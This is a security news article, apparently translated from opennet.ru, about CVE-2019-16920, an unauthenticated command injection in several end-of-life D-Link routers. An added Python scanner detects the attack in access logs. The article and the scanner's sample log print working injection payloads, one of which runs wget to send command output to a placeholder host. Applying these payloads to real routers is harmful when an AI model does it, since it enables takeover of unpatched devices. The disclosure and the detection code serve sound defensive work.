Remotely exploitable vulnerability in D-Link routers

A dangerous vulnerability (CVE-2019-16920) has been identified in D-Link wireless routers. It allows remote code execution on the device by sending a specially crafted request to the "ping_test" handler, which is reachable without authentication.

Interestingly, according to the firmware developers, the "ping_test" call should only be executed after authentication, but in reality it is executed in every case, regardless of whether the user is logged in to the web interface. Specifically, when the apply_sec.cgi script is accessed with the "action=ping_test" parameter, the script redirects to the authentication page but at the same time performs the action associated with ping_test. To execute code, a second vulnerability in ping_test itself is used: it invokes the ping utility without properly validating the IP address submitted for testing. For example, to call the wget utility and pass the output of the command "echo 1234" to an external host, it is enough to specify the parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
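As an added example (not from the advisory or from D-Link), a small Python scanner that flags the request pattern described above in web-server access-log lines: a request to apply_sec.cgi with action=ping_test whose ping_ipaddr does not decode to a plain IP address. The log lines, source addresses and timestamps are constructed for the example, and the Common Log Format layout is an assumption.

```python
import re, ipaddress
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (not from the advisory). Lines 2 and 3 show the pattern
# described above; the 302 is the redirect to the login page, yet the action still runs.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Oct/2019:10:00:01 +0000] "GET /apply_sec.cgi?action=ping_test&ping_ipaddr=10.0.0.1 HTTP/1.1" 200 512
198.51.100.7 - - [01/Oct/2019:10:00:02 +0000] "GET /apply_sec.cgi?action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo%201234) HTTP/1.1" 302 0
198.51.100.7 - - [01/Oct/2019:10:00:03 +0000] "GET /apply_sec.cgi?action=ping_test&ping_ipaddr=127.0.0.1%3Bid HTTP/1.1" 302 0
192.0.2.11 - - [01/Oct/2019:10:00:04 +0000] "GET /index.htm HTTP/1.1" 200 1024
"""

# Common Log Format (assumed): source, ident, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)')

def parse_query(query):
    # Split on '&' only and percent-decode by hand: parse_qs on older Python also splits on ';',
    # which would hide an injected ';command' inside the value.
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), unquote(value))
    return params

def is_plain_ip(value):
    # The check the advisory says ping_test lacks: the value must be an IP address and nothing more.
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def inspect_request(target):
    # Return a reason string when the request matches the CVE-2019-16920 pattern, else None.
    parts = urlsplit(target)
    if not parts.path.endswith("/apply_sec.cgi"):
        return None
    params = parse_query(parts.query)
    if params.get("action") != "ping_test":
        return None
    addr = params.get("ping_ipaddr", "")
    return None if is_plain_ip(addr) else "ping_test with non-IP ping_ipaddr: %r" % addr

def scan_log(text):
    # Return (source_ip, reason) for every line that looks like an exploitation attempt.
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            reason = inspect_request(m.group("target"))
            if reason:
                hits.append((m.group("src"), reason))
    return hits
```

Because the router redirects to the login page while still executing the action, a 302 response to such a request is not evidence that it was blocked; the decoded ping_ipaddr value is what to look at.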


The presence of the vulnerability has been officially confirmed in the following models:

  • DIR-655 with firmware 3.02b05 or later;
  • DIR-866L with firmware 1.03b04 or later;
  • DIR-1565 with firmware 1.01 or later;
  • DIR-652 (no information has been provided about the affected firmware versions)

The support period for these models has already ended, so D-Link has stated that it will not release updates to fix the vulnerability, advises against continuing to use them, and recommends replacing them with newer devices. As a workaround, access to the web interface can be restricted to trusted IP addresses only.

It was later found that the vulnerability also affects the DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 and DIR-825 models; plans for releasing an update for these are not yet known.

Source: opennet.ru
